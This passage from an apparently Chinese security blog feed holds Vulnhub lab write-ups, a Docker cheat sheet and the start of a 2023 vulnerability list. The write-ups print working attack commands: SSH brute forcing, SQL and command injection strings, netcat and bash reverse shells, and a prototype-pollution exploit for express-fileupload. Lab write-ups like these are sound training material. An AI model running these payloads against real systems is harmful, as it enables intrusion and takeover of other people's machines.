<li><a href="https://packaging.python.org/en/latest/key_projects/#project-summaries">https://packaging.python.org/en/latest/key_projects/#project-summaries</a></li>
<li><a href="https://pypi.org/help/#installing">https://pypi.org/help/#installing</a></li>
<li><a href="https://pip.pypa.io/en/stable/">https://pip.pypa.io/en/stable/</a></li>
<li><a href="https://pipx.pypa.io/stable/">https://pipx.pypa.io/stable/</a></li>
<li><a href="https://wiki.archlinux.org/title/Conda">https://wiki.archlinux.org/title/Conda</a></li>
<li><a href="https://docs.conda.io/">https://docs.conda.io</a></li>
<li><a href="https://python-poetry.org/docs/">https://python-poetry.org/docs/</a></li>
<li><a href="https://hatch.pypa.io/">https://hatch.pypa.io</a></li>
<li><a href="https://github.com/pypa/hatch">https://github.com/pypa/hatch</a></li>
<li><a href="https://github.com/pdm-project/pdm">https://github.com/pdm-project/pdm</a></li>
<li><a href="https://pdm-project.org/latest/">https://pdm-project.org/latest/</a></li>
<li><a href="https://github.com/mitsuhiko/rye">https://github.com/mitsuhiko/rye</a></li>
<li><a href="https://rye-up.com/">https://rye-up.com/</a></li>
</ul>
<hr>
<h1 id="Over-。-。-。-。"><a href="#Over-。-。-。-。" class="headerlink" title="Over 。  。    。     。"></a>Over 。  。    。     。</h1><h1 id="🥱🥱🥱🥱🥱🥱🥱🥱🥱🥱🥱🥱🥱🥱🥱🥱🥱🥱🥱"><a href="#🥱🥱🥱🥱🥱🥱🥱🥱🥱🥱🥱🥱🥱🥱🥱🥱🥱🥱🥱" class="headerlink" title="🥱🥱🥱🥱🥱🥱🥱🥱🥱🥱🥱🥱🥱🥱🥱🥱🥱🥱🥱"></a>🥱🥱🥱🥱🥱🥱🥱🥱🥱🥱🥱🥱🥱🥱🥱🥱🥱🥱🥱</h1></div></div></div>

<div class="note red icon-padding modern"><i class="note-icon fas fa-fan"></i><p>啊，再见了，再见了，哈</p>
</div>

<div class="note orange icon-padding modern"><i class="note-icon fas fa-battery-half"></i><p>我们会再见的对么</p>
</div>

<div class="note blue icon-padding modern"><i class="note-icon fas fa-bullhorn"></i><p>再见你要幸福</p>
</div>

<div class="note purple icon-padding modern"><i class="note-icon far fa-hand-scissors"></i><p>燕子，燕子</p>
</div>

]]></content>
      <categories>
        <category>Python</category>
        <category>项目管理</category>
      </categories>
      <tags>
        <tag>python</tag>
        <tag>pip</tag>
        <tag>poetry</tag>
      </tags>
  </entry>
  <entry>
    <title>Vulnhub靶场BoredHackerBlog</title>
    <url>/2022/11/12/bac5/</url>
    <content><![CDATA[<div class="note red icon-padding modern"><i class="note-icon fas fa-fan"></i><p>你好啊 </p>
</div>

<div class="note orange icon-padding modern"><i class="note-icon fas fa-battery-half"></i><p>吃了么,睡了么</p>
</div>

<div class="note blue icon-padding modern"><i class="note-icon fas fa-bullhorn"></i><p>有拥抱么，有晚安么</p>
</div>

<div class="note purple icon-padding modern"><i class="note-icon far fa-hand-scissors"></i><p>剪刀石头布,哈，我又赢了 </p>
</div>

<h1 id="靶场简介"><a href="#靶场简介" class="headerlink" title="靶场简介"></a>靶场简介</h1><div class="timeline blue"><div class='timeline-item headline'><div class='timeline-item-title'><div class='item-circle'><p>2022</p>
</div></div></div><div class='timeline-item'><div class='timeline-item-title'><div class='item-circle'><p>11-12</p>
</div></div><div class='timeline-item-content'><h6 id="Vulnhub"><a href="#Vulnhub" class="headerlink" title="Vulnhub"></a>Vulnhub</h6><p>地址：<a href="https://www.vulnhub.com/entry/boredhackerblog-cloud-av,453/">https://www.vulnhub.com/entry/boredhackerblog-cloud-av,453/</a></p>
<p>描述:<br>这是一个云端反病毒扫描程序！是一种基于云的防病毒扫描服务。<br>目前，它处于测试模式。系统要求您测试设置并查找漏洞并升级隐私。</p>
<p>难度：简单<br>目标：获得root权限</p>
<p>涉及的任务：<br>端口扫描<br>网页应用攻击<br>SQL注入<br>命令注入<br>暴力破解<br>代码分析</p>
</div></div></div>


<h1 id="系统环境"><a href="#系统环境" class="headerlink" title="系统环境"></a>系统环境</h1><div class="timeline green"><div class='timeline-item headline'><div class='timeline-item-title'><div class='item-circle'><p>2022</p>
</div></div></div><div class='timeline-item'><div class='timeline-item-title'><div class='item-circle'><p>11-12</p>
</div></div><div class='timeline-item-content'><h6 id="操作系统："><a href="#操作系统：" class="headerlink" title="操作系统："></a>操作系统：</h6><p>物理机：Arch linux<br>虚拟机：kali linux<br>虚拟机程序：Virtualbox</p>
<h6 id="使用程序："><a href="#使用程序：" class="headerlink" title="使用程序："></a>使用程序：</h6><p>arp-scan  用于目标发现<br>ping      用于目标发现<br>arping    用于目标发现<br>nmap      用于服务识别<br>nc        用于shell反弹<br>hydra     用于密码破解<br>burpsuite 用于web测试</p>
</div></div></div>


<h1 id="测试过程"><a href="#测试过程" class="headerlink" title="测试过程"></a>测试过程</h1><h2 id="主机发现"><a href="#主机发现" class="headerlink" title="主机发现"></a>主机发现</h2><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">sudo arp-scan -I eth0 -l                                                               <span class="comment">#arp发现，确定目标ip地址</span></span><br><span class="line">nmap -sn 192.168.56.1/24                                                          <span class="comment">#ping扫描，禁用端口扫描</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> $(<span class="built_in">seq</span> 0 10); <span class="keyword">do</span> ping -c 1 192.168.56.<span class="variable">$i</span>; <span class="keyword">done</span>                 <span class="comment">#shell 批量ping扫描 </span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> $(<span class="built_in">seq</span> 0 10); <span class="keyword">do</span> sudo arping -c 1 192.168.56.<span class="variable">$i</span>; <span class="keyword">done</span>     <span class="comment">#shell 批量arping扫描</span></span><br><span class="line"></span><br><span class="line">部分列举，方式很多，根据实际场景进行选择测试</span><br></pre></td></tr></table></figure>


<h2 id="服务识别"><a href="#服务识别" class="headerlink" title="服务识别"></a>服务识别</h2><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">nmap -p- 192.168.56.108    <span class="comment">#进行全端口扫描</span></span><br><span class="line">nmap -p22,8080 192.168.56.108    <span class="comment">#进行端口服务识别</span></span><br><span class="line"></span><br><span class="line">根据发现的主机目标进行全端口扫描，随后进行端口服务发现</span><br></pre></td></tr></table></figure>


<h2 id="服务入侵"><a href="#服务入侵" class="headerlink" title="服务入侵"></a>服务入侵</h2><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">hydra -l root -P rockyou.txt -t 32 -vV  192.168.56.108 ssh -f     <span class="comment">#指定账户，密码字典，对目标进行ssh暴力破解 </span></span><br><span class="line"></span><br><span class="line">对发现的服务进行入侵，ssh尝试未果</span><br></pre></td></tr></table></figure>

<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">ssh暴力破解长时间未成功，随后web访问8080端口，出现输入框，需要密码，简单测试后发现sql注入漏洞</span><br><span class="line">注入代码：<span class="string">&quot; or 1=1 --  后面有一个空格</span></span><br></pre></td></tr></table></figure>

<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">随后进入一个新的页面，简单测试后发现存在命令行注入漏洞</span><br><span class="line">命令行注入代码： | <span class="built_in">command</span></span><br></pre></td></tr></table></figure>

<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">通过命令行注入，执行nc,反弹shell</span><br><span class="line"><span class="built_in">rm</span> /tmp/m;<span class="built_in">mkfifo</span> /tmp/m;<span class="built_in">cat</span> /tmp/m|/bin/sh -i 2&gt;&amp;1|nc 192.168.56.107 4444 &gt;/tmp/m</span><br></pre></td></tr></table></figure>


<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">随后在用户主目录发现拥有suid,root权限的可执行程序，通过此程序调用nc反弹shell,获得root权限</span><br><span class="line">./upload_cloudav <span class="string">&quot;rm /tmp/m;mkfifo /tmp/m;cat /tmp/m|/bin/sh -i 2&gt;&amp;1|nc 192.168.56.107 5555 &gt;/tmp/m&quot;</span></span><br></pre></td></tr></table></figure>



<h1 id="完结撒花"><a href="#完结撒花" class="headerlink" title="完结撒花"></a>完结撒花</h1><h2 id="积极向上"><a href="#积极向上" class="headerlink" title="积极向上"></a>积极向上</h2><h2 id="热爱生活"><a href="#热爱生活" class="headerlink" title="热爱生活"></a>热爱生活</h2><div class="note red icon-padding modern"><i class="note-icon fas fa-fan"></i><p>啊，再见了，再见了，哈 </p>
</div>

<div class="note orange icon-padding modern"><i class="note-icon fas fa-battery-half"></i><p>我们会再见的对么</p>
</div>

<div class="note blue icon-padding modern"><i class="note-icon fas fa-bullhorn"></i><p>再见你要幸福</p>
</div>

<div class="note purple icon-padding modern"><i class="note-icon far fa-hand-scissors"></i><p>燕子，燕子</p>
</div>


]]></content>
      <categories>
        <category>靶场</category>
        <category>vulnhub</category>
      </categories>
      <tags>
        <tag>vulnhub</tag>
        <tag>web</tag>
        <tag>all</tag>
        <tag>靶场</tag>
      </tags>
  </entry>
  <entry>
    <title>Vulnhub靶场CHRONOS-1</title>
    <url>/2022/11/17/bc6/</url>
    <content><![CDATA[<div class="note red icon-padding modern"><i class="note-icon fas fa-fan"></i><p>你好啊 </p>
</div>

<div class="note orange icon-padding modern"><i class="note-icon fas fa-battery-half"></i><p>吃了么,睡了么</p>
</div>

<div class="note blue icon-padding modern"><i class="note-icon fas fa-bullhorn"></i><p>有拥抱么，有晚安么</p>
</div>

<div class="note purple icon-padding modern"><i class="note-icon far fa-hand-scissors"></i><p>剪刀石头布,哈，我又赢了 </p>
</div>

<h1 id="靶场简介"><a href="#靶场简介" class="headerlink" title="靶场简介"></a>靶场简介</h1><div class="timeline blue"><div class='timeline-item headline'><div class='timeline-item-title'><div class='item-circle'><p>2022</p>
</div></div></div><div class='timeline-item'><div class='timeline-item-title'><div class='item-circle'><p>11-12</p>
</div></div><div class='timeline-item-content'><h6 id="Vulnhub"><a href="#Vulnhub" class="headerlink" title="Vulnhub"></a>Vulnhub</h6><p>地址：<a href="https://www.vulnhub.com/entry/chronos-1,735/">https://www.vulnhub.com/entry/chronos-1,735/</a></p>
<p>描述:</p>
<p>难度：中等<br>目标：获得root权限,flag*2</p>
<p>涉及的任务：<br>端口扫描<br>WEB侦查<br>命令注入<br>数据编解码<br>搜索引擎<br>框架漏洞利用<br>代码审计<br>NC反弹shell<br>本地提权</p>
</div></div></div>


<h1 id="系统环境"><a href="#系统环境" class="headerlink" title="系统环境"></a>系统环境</h1><div class="timeline green"><div class='timeline-item headline'><div class='timeline-item-title'><div class='item-circle'><p>2022</p>
</div></div></div><div class='timeline-item'><div class='timeline-item-title'><div class='item-circle'><p>11-12</p>
</div></div><div class='timeline-item-content'><h6 id="操作系统："><a href="#操作系统：" class="headerlink" title="操作系统："></a>操作系统：</h6><p>物理机：Arch linux<br>虚拟机：kali linux<br>虚拟机程序：Virtualbox</p>
<h6 id="使用程序："><a href="#使用程序：" class="headerlink" title="使用程序："></a>使用程序：</h6><p>sudo netdiscover -i eth1  用于目标发现<br>arp-scan  用于目标发现<br>nmap      用于服务识别<br>nc        用于shell反弹<br>hydra     用于密码破解<br>burpsuite 用于web测试</p>
</div></div></div>


<h1 id="测试过程"><a href="#测试过程" class="headerlink" title="测试过程"></a>测试过程</h1><h2 id="主机发现"><a href="#主机发现" class="headerlink" title="主机发现"></a>主机发现</h2><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">sudo netdiscover -i eth1  指定网卡，对目标网段进行arp主机发现</span><br><span class="line"></span><br><span class="line">确定目标 192.168.56.109  为测试靶机目标</span><br></pre></td></tr></table></figure>


<h2 id="服务识别"><a href="#服务识别" class="headerlink" title="服务识别"></a>服务识别</h2><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">nmap -p- 192.168.56.109 对发现目标进行全端口扫描</span><br><span class="line">nmap -p22,80,8000 -sV 192.168.56.109  对目标开放端口进行服务识别</span><br><span class="line"></span><br><span class="line">通过扫描发现目标开启22,80,8000端口，一个ssh,两个web服务，</span><br><span class="line">80使用apache实现，8000使用nodejs,并且获得了对应版本信息，操作系统版本信息为ubuntu</span><br></pre></td></tr></table></figure>
<h2 id="服务进攻"><a href="#服务进攻" class="headerlink" title="服务进攻"></a>服务进攻</h2><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">hydra -l root -P rockyou.txt -t 32 -vV 192.168.56.109  ssh -f   首先对发现的第一个点进行攻击,使用hydra 进行ssh暴力破解</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>随后对下一个发现点进行测试，浏览器访问80,8000端口发现源代码里面存在一段相同jscript代码</p>
<p>通过cyberchef进行js代码美化，使代码便于分析，发现里面存在一个域名，但是并没有解析</p>
<p>通过本地hosts文件进行解析，使这段js代码能够正常访问这个域名</p>
<p>随后重新访问80,或者8000网站，js脚本正常加载，域名能够正常访问，发现多出了一个时间显示</p>
<p>随后使用burpsuite查看请求，发现一个get “&#x2F;date?format&#x3D;”请求,随后页面返回一个当前时间信息</p>
<p>随后将提交的数据放入cyberchef进行分析，发现编码为base58编码，解密后的信息为linux命令date的参数，猜测为直接调用date 命令返回信息，猜测存在命令注入漏洞</p>
<p>随后进行测试，将 ;ls 通过base58进行加密后提交，页面显示出目录信息，确定存在命令注入漏洞</p>
<p>进行命令测试，查找反弹shell的方式,将;ls &#x2F;bin 编码后提交,获得可执行的命令列表，发现存在nc</p>
<p>尝试利用nc反弹shell</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">nc -vnlp 1111   本地监听1111端口，等待目标连接</span><br><span class="line"><span class="built_in">rm</span> /tmp/f;<span class="built_in">mkfifo</span> /tmp/f;<span class="built_in">cat</span> /tmp/f|/bin/sh -i 2&gt;&amp;1|nc 192.168.56.1 1111 &gt;/tmp/f  通过此命令进行shell 反弹连接</span><br></pre></td></tr></table></figure>

<p>数据提交后页面显示错误信息，但是并没有影响shell的连接</p>
<p>账号为www-data，目录下发现web程序的源代码程序，进行代码分析<br>代码中对提交数据进行了判断，如果提交了whoami,id,nc等数据会反馈错误信息，但是并没有进行拦截，所以并不影响nc执行</p>
<p>随后在上一级目录中发现了另外一个目录<br>在其中一个文件中发现了使用的框架：express，express-fileupload<br>并且本地开启了8080,监听在127.0.0.1 只能当前主机本地访问，所以扫描无法发现</p>
<p>通过搜索引擎进行查找发现存在漏洞，随后在：<a href="https://blog.p6.is/Real-World-JS-1/">https://blog.p6.is/Real-World-JS-1/</a>  找到漏洞利用代码,修改目标端口，ip信息后执行</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">import requests</span><br><span class="line">cmd = <span class="string">&#x27;bash -c &quot;bash -i &amp;&gt; /dev/tcp/p6.is/8888 0&gt;&amp;1&quot;&#x27;</span></span><br><span class="line"><span class="comment"># pollute</span></span><br><span class="line">requests.post(<span class="string">&#x27;http://p6.is:7777&#x27;</span>, files = &#123;<span class="string">&#x27;__proto__.outputFunctionName&#x27;</span>: (</span><br><span class="line">    None, f<span class="string">&quot;x;console.log(1);process.mainModule.require(&#x27;child_process&#x27;).exec(&#x27;&#123;cmd&#125;&#x27;);x&quot;</span>)&#125;)</span><br><span class="line"><span class="comment"># execute command</span></span><br><span class="line">requests.get(<span class="string">&#x27;http://p6.is:7777&#x27;</span>)</span><br></pre></td></tr></table></figure>

<p>随后获得另外一个用户的shell,用户目录下存在一个flag文件。</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">sudo -l  查看当前用户的sudo权限</span><br><span class="line"></span><br><span class="line">执行后发现当前用户可以无密码sudo执行npm,node</span><br></pre></td></tr></table></figure>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">sudo node -e <span class="string">&quot;require(&#x27;child_process&#x27;).exec(&#x27;rm /tmp/m;mkfifo /tmp/m;cat /tmp/m|/bin/sh -i 2&gt;&amp;1|nc 192.168.56.1 9999 &gt;/tmp/m&#x27;)&quot;</span> </span><br><span class="line"></span><br><span class="line">使用sudo权限执行node,通过node调用nc反弹shell,获得root权限</span><br><span class="line">root目录下存在第二个flag</span><br></pre></td></tr></table></figure>



<h1 id="完结撒花"><a href="#完结撒花" class="headerlink" title="完结撒花"></a>完结撒花</h1><h2 id="积极向上"><a href="#积极向上" class="headerlink" title="积极向上"></a>积极向上</h2><h2 id="热爱生活"><a href="#热爱生活" class="headerlink" title="热爱生活"></a>热爱生活</h2><div class="note red icon-padding modern"><i class="note-icon fas fa-fan"></i><p>啊，再见了，再见了，哈 </p>
</div>

<div class="note orange icon-padding modern"><i class="note-icon fas fa-battery-half"></i><p>我们会再见的对么</p>
</div>

<div class="note blue icon-padding modern"><i class="note-icon fas fa-bullhorn"></i><p>再见你要幸福</p>
</div>

<div class="note purple icon-padding modern"><i class="note-icon far fa-hand-scissors"></i><p>燕子，燕子</p>
</div>


]]></content>
      <categories>
        <category>靶场</category>
        <category>vulnhub</category>
      </categories>
      <tags>
        <tag>vulnhub</tag>
        <tag>web</tag>
        <tag>all</tag>
        <tag>靶场</tag>
      </tags>
  </entry>
  <entry>
    <title>Docker使用参考</title>
    <url>/2022/11/26/docker1/</url>
    <content><![CDATA[<div class="note red icon-padding modern"><i class="note-icon fas fa-fan"></i><p>你好啊 </p>
</div>

<div class="note orange icon-padding modern"><i class="note-icon fas fa-battery-half"></i><p>吃了么,睡了么</p>
</div>

<div class="note blue icon-padding modern"><i class="note-icon fas fa-bullhorn"></i><p>有拥抱么，有晚安么</p>
</div>

<div class="note purple icon-padding modern"><i class="note-icon far fa-hand-scissors"></i><p>剪刀石头布,哈，我又赢了 </p>
</div>

<h1 id="Docker简介"><a href="#Docker简介" class="headerlink" title="Docker简介"></a>Docker简介</h1><div class="timeline blue"><div class='timeline-item headline'><div class='timeline-item-title'><div class='item-circle'><p>2022</p>
</div></div></div><div class='timeline-item'><div class='timeline-item-title'><div class='item-circle'><p>11-26</p>
</div></div><div class='timeline-item-content'><h6 id="Docker"><a href="#Docker" class="headerlink" title="Docker"></a>Docker</h6><p>官网：<a href="https://www.docker.com/">https://www.docker.com/</a></p>
<p>描述: Docker 是一个用于开发、交付和运行应用程序的开放平台。 Docker 使您能够将应用程序与基础架构分开，以便 您可以快速交付软件。使用 Docker，您可以管理您的基础架构 以与管理应用程序相同的方式。通过利用 Docker 的 快速传送、测试和部署代码的方法，您可以 显著减少编写代码和在生产环境中运行代码之间的延迟。</p>
</div></div></div>


<h1 id="基础教程"><a href="#基础教程" class="headerlink" title="基础教程"></a>基础教程</h1><div class="timeline red"><div class='timeline-item headline'><div class='timeline-item-title'><div class='item-circle'><p>2022</p>
</div></div></div><div class='timeline-item'><div class='timeline-item-title'><div class='item-circle'><p>11-26</p>
</div></div><div class='timeline-item-content'><figure class="highlight shell"><table><tr><td class="code"><pre><span class="line">docker ps	列出正在运行的容器</span><br><span class="line">docker ps -a	列出所有容器</span><br><span class="line">docker ps -s	列出正在运行的容器 (带 CPU / 内存)</span><br><span class="line">docker images	列出所有镜像</span><br><span class="line">docker exec -it &lt;container&gt;  bash	连接到容器</span><br><span class="line">docker logs &lt;container&gt;	显示容器的控制台日志</span><br><span class="line">docker stop &lt;container&gt;	停止容器</span><br><span class="line">docker restart &lt;container&gt;	重启一个容器</span><br><span class="line">docker rm &lt;container&gt;	移除一个容器</span><br><span class="line">docker port &lt;container&gt;	显示容器的端口映射</span><br><span class="line">docker top &lt;container&gt;	列出进程</span><br><span class="line">docker kill &lt;container&gt;	杀死一个容器</span><br><span class="line"></span><br><span class="line">docker start nginx-server	开始</span><br><span class="line">docker stop nginx-server	停止</span><br><span class="line">docker restart nginx-server	重启</span><br><span class="line">docker pause nginx-server	暂停</span><br><span class="line">docker unpause nginx-server	取消暂停</span><br><span class="line">docker wait nginx-server	阻塞容器</span><br><span class="line">docker kill nginx-server	发送 SIGKILL</span><br><span class="line">docker attach nginx-server	连接到现有容器</span><br><span class="line">docker pull 镜像   从docker registry中拉取镜像</span><br><span class="line"></span><br><span class="line">docker ps	列出正在运行的容器</span><br><span class="line">docker ps -a	列出所有容器</span><br><span class="line">docker logs nginx-server	容器日志</span><br><span class="line">docker inspect nginx-server	检查容器</span><br><span class="line">docker events nginx-server	容器事件</span><br><span class="line">docker port nginx-server	公共端口</span><br><span class="line">docker top nginx-server	运行进程</span><br><span class="line">docker stats nginx-server	容器资源使用</span><br><span class="line">docker diff nginx-server	列出对容器所做的更改</span><br><span class="line"></span><br><span class="line">docker images	列出镜像</span><br><span class="line">docker rmi nginx	删除镜像</span><br><span class="line">docker load &lt; ubuntu.tar.gz	加载一个 tarred 存储库</span><br><span class="line">docker load --input ubuntu.tar	加载一个 tarred 存储库</span><br><span class="line">docker save busybox &gt; ubuntu.tar	将镜像保存到 tar 存档</span><br><span class="line">docker history	显示镜像的历史</span><br><span class="line">docker commit nginx	将容器另存为镜像。</span><br><span class="line">docker tag nginx eon01/nginx	标记镜像</span><br><span class="line">docker push eon01/nginx	推送镜像</span><br><span class="line"></span><br><span class="line">docker run -d -p 80:80 docker/imagesname  -d后台允许，-p端口映射</span><br><span class="line">docker run -it ubuntu /bin/bash   -i交互式  -t终端</span><br><span class="line"></span><br><span class="line">docker exec id   shell command  容器执行命令</span><br><span class="line">docker exec -u root -it imagesname  /bin/bash</span><br><span class="line">docker exec -it 容器名称 sh  从正在运行的容器中打开一个shell </span><br><span class="line"></span><br><span class="line">docker ps -a 列出所有docker容器（包括停止的）</span><br><span class="line">docker start | stop 容器名称 启动或停止现有容器</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">下载dockerfile，json文件</span><br><span class="line">docker build -t setname    编译镜像，设置名为setname</span><br><span class="line"></span><br><span class="line">更新源代码，重新编译，运行，删除旧容器才可以适用新容器</span><br><span class="line"></span><br><span class="line">删除容器</span><br><span class="line">docker ps 列出获取容器id</span><br><span class="line">docker stop id   停止容器</span><br><span class="line">docker rm id  停止容器后删除容器</span><br><span class="line">docker rm -f id 停止并且删除</span><br><span class="line">-----------------------------------------------------------</span><br><span class="line">docker ps -a  列出所有容器</span><br><span class="line">docker kill id 杀死运行中的容器</span><br><span class="line">docker images 列出docker镜像</span><br><span class="line">docker rmi id 删除镜像</span><br><span class="line">docker system prune  删除与容器无关镜像，容器，卷，网络</span><br><span class="line">docker system prune -a 删除任何停止的容器和所有未使用的图像（不仅仅是悬空的图像）</span><br><span class="line">rm -R /var/lib/docker   删除docker数据目录</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">docker容器移除后数据不会保存（持久化数据设置）</span><br><span class="line">docker volume create todo-db 创建数据库</span><br><span class="line">设置镜像不能运行，删除后开始设置</span><br><span class="line">docker run -dp 80:80 -v todo-db:/etc/todos images-name  运行时指定卷安装</span><br><span class="line">删除后启动，数据不会清除，</span><br><span class="line">docker volume inspect todo-db 查看卷信息，数据位置信息</span><br><span class="line"></span><br><span class="line">适用绑定挂载（持久化数据，可以控制确切挂载点，实时修改）</span><br><span class="line">docker run -dp 3000:3000 \</span><br><span class="line">     -w /app -v &quot;$(pwd):/app&quot; \</span><br><span class="line">     node:12-alpine \</span><br><span class="line">-w 指定工作目录</span><br><span class="line">-v 将容器种主机当前目录挂载到工作目录</span><br><span class="line"></span><br><span class="line">docker logs -f 容器名称     获取并查看容器日志</span><br></pre></td></tr></table></figure>

</div></div></div>

<div class="timeline green"><div class='timeline-item headline'><div class='timeline-item-title'><div class='item-circle'><p>2022</p>
</div></div></div><div class='timeline-item'><div class='timeline-item-title'><div class='item-circle'><p>11-26</p>
</div></div><div class='timeline-item-content'><h6 id="参考地址"><a href="#参考地址" class="headerlink" title="参考地址"></a>参考地址</h6><p><a href="https://docs.docker.com/get-started/overview/">https://docs.docker.com/get-started/overview/</a><br><a href="https://quickref.cn/docs/docker.html">https://quickref.cn/docs/docker.html</a></p>
</div></div></div>




<h1 id="完结撒花"><a href="#完结撒花" class="headerlink" title="完结撒花"></a>完结撒花</h1><h2 id="积极向上"><a href="#积极向上" class="headerlink" title="积极向上"></a>积极向上</h2><h2 id="热爱生活"><a href="#热爱生活" class="headerlink" title="热爱生活"></a>热爱生活</h2><div class="note red icon-padding modern"><i class="note-icon fas fa-fan"></i><p>啊，再见了，再见了，哈 </p>
</div>

<div class="note orange icon-padding modern"><i class="note-icon fas fa-battery-half"></i><p>我们会再见的对么</p>
</div>

<div class="note blue icon-padding modern"><i class="note-icon fas fa-bullhorn"></i><p>再见你要幸福</p>
</div>

<div class="note purple icon-padding modern"><i class="note-icon far fa-hand-scissors"></i><p>燕子，燕子</p>
</div>


]]></content>
      <categories>
        <category>tool</category>
        <category>docker</category>
      </categories>
      <tags>
        <tag>all</tag>
        <tag>docker</tag>
        <tag>tool</tag>
        <tag>skill</tag>
      </tags>
  </entry>
  <entry>
    <title>HVV-2023-wps-rce</title>
    <url>/2023/08/20/hvv2023wps-rce/</url>
    <content><![CDATA[<div class="note red icon-padding flat"><i class="note-icon fas fa-fan"></i><p>奇奇怪怪</p>
</div>

<div class="note orange icon-padding modern"><i class="note-icon fas fa-battery-half"></i><p>安全小技巧</p>
</div>

<div class="note blue icon-padding simple"><i class="note-icon fas fa-bullhorn"></i><p>新的一天开始了</p>
</div>

<div class="note purple icon-padding disabled"><i class="note-icon far fa-hand-scissors"></i><p>剪刀石头布,哈，我又赢了 </p>
</div>

<div class="timeline pink"><div class='timeline-item headline'><div class='timeline-item-title'><div class='item-circle'><p>2023</p>
</div></div></div><div class='timeline-item'><div class='timeline-item-title'><div class='item-circle'><p>08-20</p>
</div></div><div class='timeline-item-content'><p>永远新的开始啊</p>
<h1 id="2023-HVV-0day-x2F-Nday-x2F-POC-x2F-EXP-一键鈤卫星系列之-WPS-代码执行-威胁情报"><a href="#2023-HVV-0day-x2F-Nday-x2F-POC-x2F-EXP-一键鈤卫星系列之-WPS-代码执行-威胁情报" class="headerlink" title="2023 HVV 0day &#x2F; Nday &#x2F; POC &#x2F; EXP  一键鈤卫星系列之 WPS 代码执行-威胁情报"></a><strong>2023 HVV 0day &#x2F; Nday &#x2F; POC &#x2F; EXP  一键鈤卫星系列之</strong> WPS 代码执行-威胁情报</h1><h1 id="漏洞情报列表"><a href="#漏洞情报列表" class="headerlink" title="漏洞情报列表"></a>漏洞情报列表</h1><ul>
<li>安**御运维审计与风险控制系统堡垒机任意用户注册</li>
<li>致*oa 任意文件上传</li>
<li>致*oa rce</li>
<li>用*移动管理系统 uploadApk.d</li>
<li>用*时空KSOA PayBill SQL注入漏洞</li>
<li>网* SecSSL 3600安全接入网关系统 任意密码修改漏洞</li>
<li>网* SecGate 3600 防火墙 obj_app_upfile接口存在任意文件上传漏洞</li>
<li>通*oaCVE-2023-4166</li>
<li>通*oa_sql注入</li>
<li>天*网关前台SQL注入</li>
<li>深*服应用交付系统命令执行漏洞</li>
<li>深*服报表</li>
<li>绿*sas安全审计系统任意文件读取漏洞</li>
<li>绿* SAS堡垒机 local_user.php 任意用户登录漏洞</li>
<li>绿* SAS堡垒机 Exec 远程命令执行漏洞</li>
<li>蓝*-OA-RCE</li>
<li>金*OA C6-GetSqlData.aspx SQL注入漏洞 POC</li>
<li>汉*SRM tomcat.jsp 登录绕过漏洞</li>
<li>海**视前台上传</li>
<li>广*达oa 后台文件上传漏洞</li>
<li>绿* NF 下一代防火墙 任意文件上传漏洞</li>
<li>HIKVISION 视频编码设备接入网关 showFile.php 任意文件下载漏洞</li>
<li>HiKVISION 综合安防管理平台 env 信息泄漏漏洞</li>
<li>禅* 16.5 router.class.php SQL注入漏洞</li>
<li>网* SecGate 3600 防火墙 obj_app_upfile 任意文件上传漏洞</li>
<li>金*OA 未授权</li>
<li>宏*OA文件上传</li>
<li>用*畅捷通 T注入</li>
<li>用*时空 KSOA servletimagefield 文件 sKeyvalue 参数SQL 注入</li>
<li>用*时空 KSOATaskRequestServlet sql注入漏洞</li>
<li>宏* HCM codesettree SQL 注入漏洞</li>
<li>泛* ShowDocsImagesql注入漏洞</li>
<li>3<em>0 新天</em>终端安全管理系统信息泄露漏洞</li>
<li>企业微*（私有化版本）敏感信息泄露漏洞</li>
<li>华*动力oa SQL注入</li>
<li>用*文件服务器认证绕过</li>
<li>广联&amp; Linkworks GetIMDictionarySQL 注入漏洞</li>
<li>网* ACM 上网行为管理系统bottomframe.cgi SQL 注入漏洞</li>
<li>Panel loadfile 后台文件读取漏洞</li>
<li>金* 微信管理平台 getsysteminfo 未授权访问漏洞</li>
<li>PigCMS action_flashUpload 任意文件上传漏洞</li>
<li>Coremail 邮件系统未授权访问获取管理员账密</li>
<li>Milesight VPN server.js 任意文件读取漏洞</li>
<li>红* oa 注入</li>
<li>nginx配置错误导致的路径穿越风险</li>
<li>用*GRP-U8存在信息泄露</li>
<li>启**辰-4A 统一安全管控平台 getMater 信息泄漏</li>
<li>广*达oa sql注入漏洞</li>
<li>泛*oa代码执行</li>
<li>泛*E-Office9文件上传漏洞</li>
<li>泛* Weaver E-Office9 前台文件包含</li>
<li>泛* E-Cology 某版本 SQL注入漏洞 POC</li>
<li>大*智慧园区综合管理平台 文件上传漏洞</li>
<li>大*智慧园区综合管理平台 searchJson SQL注入漏洞</li>
<li>大*智慧园区任意密码读取攻击</li>
<li>辰*景云终端安全管理系统 login SQL注入漏洞</li>
<li>x捷 xBR 路由器 任意文件上传漏洞</li>
<li>wps 代码执行</li>
<li>Openfire身份认证绕过漏洞</li>
<li>Nacos-Sync</li>
<li>Eramba任意代码执行漏洞</li>
<li>绿* NF 下一代防火墙 任意文件上传漏洞</li>
<li>HIKVISION 视频编码设备接入网关 showFile.php 任意文件下载漏洞</li>
<li>HiKVISION 综合安防管理平台 env 信息泄漏漏洞</li>
<li>禅* 16.5 router.class.php SQL注入漏洞</li>
<li>网* SecGate 3600 防火墙 obj_app_upfile 任意文件上传漏洞</li>
<li>金*OA 未授权</li>
<li>宏*OA文件上传</li>
<li>用*畅捷通 T注入</li>
<li>用*时空 KSOA servletimagefield 文件 sKeyvalue 参数SQL 注入</li>
